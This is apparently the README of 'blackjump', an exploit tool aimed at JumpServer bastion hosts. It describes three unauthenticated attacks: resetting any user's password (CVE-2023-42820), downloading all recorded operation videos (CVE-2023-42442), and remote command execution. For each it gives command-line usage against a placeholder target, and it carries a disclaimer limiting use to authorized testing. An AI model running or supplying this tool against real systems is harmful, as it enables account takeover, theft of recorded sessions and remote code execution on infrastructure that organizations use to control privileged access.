Legal Disclaimer: This tool is only intended for legally authorized enterprise security construction activities.
When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not use against unauthorized targets.
If you engage in any illegal behavior while using this tool, you shall bear the corresponding consequences on your own, and we will not assume any legal or joint liability.
JumpServer Fortress Machine Integrated Vulnerability Exploit Tool
- Unauthorized password reset for any user (CVE-2023-42820)
- Unauthorized download of all operation videos (CVE-2023-42442)
- Unauthorized Remote Command Execution (RCE 2021)
python3 -m pip install -r requirements.txt
- CVE-2023-42820: You can specify the `--user` and `--email` options if you know the username and email in the reset password module
python3 blackjump.py reset https://vulerability
- CVE-2023-42442: The `<uuid4>.tar` file in the `outputs/` directory can be loaded into the JumpServer player
python3 blackjump.py dump https://vulerability
- RCE
python3 blackjump.py rce http(s)://vulerability
- help
python3 blackjump.py {reset,dump,rce} -h
- https://github.com/Veraxy00/Jumpserver-EXP (Made some optimizations)